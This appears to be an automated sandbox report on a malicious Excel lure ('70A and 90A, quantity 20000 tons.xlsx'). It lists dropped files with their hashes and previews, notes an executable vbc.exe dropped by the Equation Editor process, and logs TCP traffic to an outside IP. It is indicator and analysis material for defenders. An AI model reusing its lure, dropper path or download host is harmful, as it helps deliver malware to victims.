        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7598FF8F.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):7788
        Entropy (8bit):5.531623233321457
        Encrypted:false
        SSDEEP:96:waCCblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wiTNAK4oOIGbK1RvVwPAWmOHX
        MD5:CED2E1E8E8B2B84432212782C0EABE1E
        SHA1:2B740B308A96EE3BE102D5F7F845097F75C9B4F1
        SHA-256:6787B44903C4894E7A5B4DE5E08A6B24B69D6C7128B60E36115D9704D5D69E22
        SHA-512:C8D69200E6677092BCABBD3725CF530228DA977FFB4E3B373BC40C378D8510255CA8CF35EB58A28EA8B0CEF7405D61848A75B9E62D5E59D4A9D63BA649104541
        Malicious:false
        Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....m.d...................4.;..;...p....\...4.;.....4.;...;...p....4.;.<5.u..p....`.p@...$y.w......{.....X.;....w....$.....'.d........;..^.p.....^.ph.............{.-.....;..<.w................<.9u.Z.v....X..\....@..........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\812083D0.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96D57846.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):648132
        Entropy (8bit):2.812392509595421
        Encrypted:false
        SSDEEP:3072:g34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:a4UcLe0JOcXuunhqcS
        MD5:95BF924A62DA7670376729A07281172C
        SHA1:B3522D56865D6ABC0A8E9DF89210953629F8F1E1
        SHA-256:1C0FC09F912F60419885DA23F4D805A27BAEE438B3570C7EDA1C24F1C0DF7FC4
        SHA-512:99499B64A97DB3EE2BB1A2E64614A741ACF717A861C426833246B8C9D47F5AD1747AE9835D9EF01431BD97D8B148CD4D8209235BF77F78A2ABA40D19EA969FF2
        Malicious:false
        Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................HY$.....V.-zQY.@..%.....V...V.....p.V...V..N.Zp.V.h.V.......V.T.V..N.Zp.V.h.V. ....yQYh.V.p.V. ............zQY........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............V.X...h.V...V............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CAFB6D09.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC3A9E8A.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE46261C.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E38EF444.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F57B176D.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7F5A728.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\Desktop\~$70A and 90A, quantity 20000 tons.xlsx
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):330
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
        MD5:96114D75E30EBD26B572C1FC83D1D02E
        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
        Malicious:true
        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        C:\Users\Public\vbc.exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):114688
        Entropy (8bit):5.8596280022112595
        Encrypted:false
        SSDEEP:1536:W+u85vTXEEX5wkjFXW8sBM2dIaK4AUpdQANZ2ftq82Pkl2dp5JT:JvTUE+8sBrdMUpdNwwv62VJT
        MD5:C10CEF2B31864B5F9FB13B9AF78765B2
        SHA1:3E76E8C204098C1B52B78508286A962C35E637FE
        SHA-256:6E85C6CFE631FEEF7D11250670EFCBAF476886D8EE13D11A8873CC5DF84A14F9
        SHA-512:9531703F2320855B764F46E69372BB2AD5E10A5148BFABD087A89A4771B6F8129B3A9DB68CFABE047458E89F6C2711372E2D39E7DB40C43D709D36A6940DD397
        Malicious:true
        Antivirus:
        • Antivirus: Virustotal, Detection: 21%, Browse
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L......N.................`...P...............p....@.............B...................-........................................f..(........1..................................................................(... .......X............................text....[.......`.................. ..`.data...4....p.......p..............@....rsrc....1.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

        Static File Info

        General

        File type:CDFV2 Encrypted
        Entropy (8bit):7.9887911524387505
        TrID:
        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
        File name:70A and 90A, quantity 20000 tons.xlsx
        File size:604160
        MD5:3768dc6c162a6eb46c160c48916f76d2
        SHA1:3387bace48ffd1c07cb17b99e6c7919e11bbc508
        SHA256:5a95734977adad3b8ab8c71070fd89958b0ab5e756f297cf3303c697728f3ce9
        SHA512:ee811332cb9e11327648cdce8e35506fa2dbde6530ac22d3e7d9f096680c30b4ec30929c21f2e078de11dd85f79645927219c40f9434b44986e2ed344969b782
        SSDEEP:12288:MwJ5MGL6Aymbzifz9ZUSi/RAM2j1+/Z6/GSxFAUX/b7IUO67kpu0O:MwB6Aycib4Kfjc6xaUPbdHnd
        File Content Preview:........................>......................................................................................................................................................................................................................................

        File Icon

        Icon Hash:e4e2aa8aa4b4bcb4

        Network Behavior

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Sep 15, 2021 11:38:12.588319063 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.699985981 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.700148106 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.700417995 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.814189911 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814250946 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814275026 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814310074 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814337015 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814357996 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814384937 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814384937 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.814409971 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814414024 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.814419031 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.814423084 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.814433098 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814444065 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.814456940 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.814457893 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.814488888 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.829350948 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927423000 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927458048 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927483082 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927503109 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927505016 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927524090 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927532911 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927537918 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927541018 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927548885 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927558899 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927577019 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927599907 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927602053 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927625895 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927627087 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927642107 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927649975 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927663088 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927674055 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927680969 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927695990 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927711010 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927716017 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927727938 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927736998 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927745104 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927767038 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927772045 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927789927 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927803040 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927809000 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927819014 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927828074 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927838087 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927848101 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927865982 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927866936 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:12.927881002 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.927897930 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:12.929517031 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043282032 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043335915 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043370008 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043395996 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043423891 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043454885 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043467999 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043483019 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043493032 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043498039 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043513060 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043515921 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043540955 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043570995 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043576002 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043600082 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043631077 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043633938 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043658972 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043688059 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043697119 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043718100 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043730974 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043747902 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043751001 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043777943 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043783903 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043807983 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043811083 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043838978 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.043951988 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.043987036 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.044006109 CEST4916780192.168.2.22192.3.141.149
